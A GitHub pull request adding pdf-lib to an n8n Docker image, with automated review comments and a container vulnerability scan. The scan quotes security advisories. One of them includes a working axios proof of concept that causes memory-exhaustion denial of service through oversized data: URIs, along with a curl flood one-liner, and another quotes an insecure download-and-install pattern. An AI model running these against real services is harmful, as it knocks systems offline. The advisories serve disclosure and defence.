Skip to content

Conversation

@anatolyshipitz
Copy link
Collaborator

@anatolyshipitz anatolyshipitz commented Oct 27, 2025

Summary

Adds pdf-lib package to the n8n Docker container to enable PDF manipulation capabilities in workflows.

Changes

  • Added pdf-lib@1.17.1 installation to Dockerfile.n8n
  • Added pdf-lib to NODE_FUNCTION_ALLOW_EXTERNAL allowlist for use in Code/Function nodes
  • Introduced PDF_LIB_VERSION build argument for version management

Technical Details

  • Package: pdf-lib@1.17.1
  • Installation: Global npm install with legacy-peer-deps and unsafe-perm flags
  • Availability: Can be used in n8n Code and Function nodes via require('pdf-lib')

Benefits

  • Enables PDF creation, modification, and manipulation directly in n8n workflows
  • Allows programmatic PDF operations without external services
  • Maintains consistent package versioning through build arguments

Summary by CodeRabbit

  • New Features
    • Added PDF library support, enabling users to work with PDF files and perform document operations as part of their workflow automations.

- Added PDF_LIB_VERSION argument to specify the version of pdf-lib.
- Included pdf-lib installation in the npm install command to enhance PDF processing capabilities.

These changes improve the n8n environment by enabling support for PDF manipulation features.
- Added pdf-lib to NODE_FUNCTION_ALLOW_EXTERNAL to enhance PDF processing capabilities within n8n.

This change improves the functionality of the n8n environment by enabling support for additional PDF manipulation features.
@anatolyshipitz anatolyshipitz self-assigned this Oct 27, 2025
@coderabbitai
Copy link

coderabbitai bot commented Oct 27, 2025

Walkthrough

Modified Dockerfile.n8n to add support for pdf-lib by introducing a build argument PDF_LIB_VERSION, installing pdf-lib globally via npm, and extending the NODE_FUNCTION_ALLOW_EXTERNAL environment variable to include pdf-lib.

Changes

Cohort / File(s) Summary
Docker configuration for pdf-lib support
Dockerfile.n8n
Added ARG PDF_LIB_VERSION build argument; updated npm install step to include pdf-lib@${PDF_LIB_VERSION}; extended ENV NODE_FUNCTION_ALLOW_EXTERNAL to include pdf-lib alongside existing entries

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

  • Straightforward configuration changes with no complex logic or branching conditions

Possibly related PRs

Suggested reviewers

  • killev

Poem

🐰 A PDF lib hops into the scene,
In Docker's domain, so clean and serene,
With args and allows, we weave the thread,
Global npm packages, perfectly spread! 📄✨

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)
Check name Status Explanation Resolution
Docstring Coverage ⚠️ Warning Docstring coverage is 0.00% which is insufficient. The required threshold is 80.00%. You can run @coderabbitai generate docstrings to improve docstring coverage.
✅ Passed checks (2 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title Check ✅ Passed The PR title "Add pdf-lib Support to n8n Container" clearly and accurately reflects the primary purpose of the changeset. The modifications directly implement this goal by adding a build argument for pdf-lib versioning, installing pdf-lib in the Docker container, and configuring it for use in n8n Code/Function nodes through the NODE_FUNCTION_ALLOW_EXTERNAL allowlist. The title is specific and descriptive, avoiding vague terms, and a developer scanning the commit history would immediately understand that this PR adds PDF library functionality to the n8n container environment.
✨ Finishing touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch feature/add-pdf-lib

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

Copy link

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 0

🧹 Nitpick comments (2)
Dockerfile.n8n (2)

14-19: Document npm install flags and verify package installation compatibility.

The npm install uses several flags (--legacy-peer-deps, --unsafe-perm, --ignore-scripts) that warrant documentation. Ensure that pdf-lib installs cleanly with these flags and that --legacy-peer-deps doesn't mask actual peer dependency conflicts that could cause runtime issues.

Consider adding an inline comment explaining the purpose of these flags, especially --unsafe-perm, which permits elevated permissions during npm installation.

Apply this diff to add clarifying comments:

 # Install git for backup script and other packages + install external packages in one layer
 USER root
 RUN set -eux; \
   apk add --no-cache git=2.49.1-r0 && \
+  # Install external npm packages globally for use in Code/Function nodes
+  # --legacy-peer-deps: allows compatible peer dependency versions
+  # --unsafe-perm: permits npm install to run as root in container context
   npm install -g --no-audit --no-fund --ignore-scripts \
     --legacy-peer-deps --no-workspaces \
     --unsafe-perm \

23-23: Add inline documentation for NODE_FUNCTION_ALLOW_EXTERNAL.

The environment variable correctly lists all globally installed packages, enabling their use within n8n Code/Function nodes. Consider adding a comment to explain its purpose for future maintainers.

Apply this diff to add documentation:

 # Configure external modules allowlist used by Code/Function nodes
+# Comma-separated list of npm packages available via require() in Code nodes
 ENV NODE_FUNCTION_ALLOW_EXTERNAL="showdown,slackify-markdown,pdf-lib"
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 0dc0722 and f83377b.

📒 Files selected for processing (1)
  • Dockerfile.n8n (2 hunks)
🧰 Additional context used
📓 Path-based instructions (2)
Dockerfile.{n8n,temporal}

📄 CodeRabbit inference engine (.cursor/rules/docker-configuration.mdc)

Custom Docker images must be defined using Dockerfile.n8n and Dockerfile.temporal, each extending their respective official base images with custom configurations

Files:

  • Dockerfile.n8n
Dockerfile.n8n

📄 CodeRabbit inference engine (.cursor/rules/project-structure.mdc)

Use Dockerfile.n8n for custom n8n image configuration.

Files:

  • Dockerfile.n8n
🧠 Learnings (1)
📓 Common learnings
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to Dockerfile.n8n : Use Dockerfile.n8n for custom n8n image configuration.
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (1)
Dockerfile.n8n (1)

8-8: No issues found with pdf-lib@1.17.1.

The version 1.17.1 is the latest published version on npm and has no known security vulnerabilities reported in public trackers or the project advisories. The exact version pin (rather than a range) is appropriate for stability and reproducibility in this context.

@github-actions
Copy link

github-actions bot commented Oct 27, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference n8n-test:latest
digestsha256:be96ff1a608da9eab5e91d533e5e2a5bb7362ddfb37cc309963c76bcb8861b20
vulnerabilitiescritical: 2 high: 14 medium: 0 low: 0
platformlinux/amd64
size342 MB
packages1848
📦 Base Image node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
digestsha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilitiescritical: 0 high: 1 medium: 2 low: 2
critical: 2 high: 2 medium: 0 low: 0 libxml2 2.13.8-r0 (apk)

pkg:apk/alpine/libxml2@2.13.8-r0?os_name=alpine&os_version=3.22

critical : CVE--2025--49796

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.438%
EPSS Percentile62nd percentile
Description

critical : CVE--2025--49794

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.251%
EPSS Percentile48th percentile
Description

high : CVE--2025--6021

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.546%
EPSS Percentile67th percentile
Description

high : CVE--2025--49795

Affected range<2.13.9-r0
Fixed version2.13.9-r0
EPSS Score0.141%
EPSS Percentile35th percentile
Description
critical: 0 high: 2 medium: 0 low: 0 xlsx 0.20.2 (npm)

pkg:npm/xlsx@0.20.2

high 7.8: CVE--2023--30533 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range>=0
Fixed versionNot Fixed
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score4.328%
EPSS Percentile88th percentile
Description

All versions of SheetJS CE through 0.19.2 are vulnerable to "Prototype Pollution" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.

high 7.5: CVE--2024--22363 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range>=0
Fixed versionNot Fixed
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.079%
EPSS Percentile24th percentile
Description

SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS).

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE--2025--59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range>=2.0.0
<2.1.4
Fixed version2.1.4
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score0.024%
EPSS Percentile5th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 openssh 10.0_p1-r7 (apk)

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high : CVE--2023--51767

Affected range<=10.0_p1-r7
Fixed versionNot Fixed
EPSS Score0.008%
EPSS Percentile1st percentile
Description
critical: 0 high: 1 medium: 0 low: 0 n8n 1.109.2 (npm)

pkg:npm/n8n@1.109.2

high 8.8: GHSA--365g--vjw2--grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range<=1.114.4
Fixed versionNot Fixed
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]"

References

n8n docs: Execute Command
n8n docs: Blocking nodes

critical: 0 high: 1 medium: 0 low: 0 curl 8.14.1-r1 (apk)

pkg:apk/alpine/curl@8.14.1-r1?os_name=alpine&os_version=3.22

high : CVE--2025--9086

Affected range<8.14.1-r2
Fixed version8.14.1-r2
EPSS Score0.077%
EPSS Percentile24th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 axios 1.11.0 (npm)

pkg:npm/axios@1.11.0

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.025%
EPSS Percentile5th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

critical: 0 high: 1 medium: 0 low: 0 playwright 1.54.2 (npm)

pkg:npm/playwright@1.54.2

high 8.7: CVE--2025--59288 Improper Verification of Cryptographic Signature

Affected range<1.55.1
Fixed version1.55.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
EPSS Score0.027%
EPSS Percentile6th percentile
Description

Summary

Use of curl with the -k (or --insecure) flag in installer scripts allows attackers to deliver arbitrary executables via Man-in-the-Middle (MitM) attacks. This can lead to full system compromise, as the downloaded files are installed as privileged applications.

Details

The following scripts in the microsoft/playwright repository at commit bee11cbc28f24bd18e726163d0b9b1571b4f26a8 use curl -k to fetch and install executable packages without verifying the authenticity of the SSL certificate:

In each case, the shell scripts download a browser installer package using curl -k and immediately install it:

curl --retry 3 -o ./<pkg-file> -k <url>
sudo installer -pkg /tmp/<pkg-file> -target /

Disabling SSL verification (-k) means the download can be intercepted and replaced with malicious content.

PoC

A high-level exploitation scenario:

  1. An attacker performs a MitM attack on a network where the victim runs one of these scripts.
  2. The attacker intercepts the HTTPS request and serves a malicious package (for example, a trojaned browser installer).
  3. Because curl -k is used, the script downloads and installs the attacker's payload without any certificate validation.
  4. The attacker's code is executed with system privileges, leading to full compromise.

No special configuration is needed: simply running these scripts on any untrusted or hostile network is enough.

Impact

This is a critical Remote Code Execution (RCE) vulnerability due to improper SSL certificate validation (CWE-295: Improper Certificate Validation). Any user or automation running these scripts is at risk of arbitrary code execution as root/admin, system compromise, data theft, or persistent malware installation. The risk is especially severe because browser packages are installed with elevated privileges and the scripts may be used in CI/CD or developer environments.

Fix

Credit

  • This vulnerability was uncovered by tooling by Socket
  • This vulnerability was confirmed by @evilpacket
  • This vulnerability was reported by @JLLeitschuh at Socket

Disclosure

critical: 0 high: 1 medium: 0 low: 0 openssl 3.5.2-r0 (apk)

pkg:apk/alpine/openssl@3.5.2-r0?os_name=alpine&os_version=3.22

high : CVE--2025--9230

Affected range<3.5.4-r0
Fixed version3.5.4-r0
EPSS Score0.026%
EPSS Percentile6th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 expat 2.7.1-r0 (apk)

pkg:apk/alpine/expat@2.7.1-r0?os_name=alpine&os_version=3.22

high : CVE--2025--59375

Affected range<2.7.2-r0
Fixed version2.7.2-r0
EPSS Score0.102%
EPSS Percentile29th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 n8n-nodes-base 1.107.0 (npm)

pkg:npm/n8n-nodes-base@1.107.0

high 8.8: GHSA--365g--vjw2--grx8 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range<=1.113.0
Fixed versionNot Fixed
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE: "[\"n8n-nodes-base.executeCommand\"]"

References

n8n docs: Execute Command
n8n docs: Blocking nodes

critical: 0 high: 1 medium: 0 low: 0 axios 1.8.3 (npm)

pkg:npm/axios@1.8.3

high 7.5: CVE--2025--58754 Allocation of Resources Without Limits or Throttling

Affected range>=1.0.0
<1.12.0
Fixed version1.12.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.025%
EPSS Percentile5th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

@anatolyshipitz anatolyshipitz enabled auto-merge (squash) October 28, 2025 12:51
@sonarqubecloud
Copy link

1 similar comment
@sonarqubecloud
Copy link

sonarqubecloud bot commented Dec 3, 2025

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants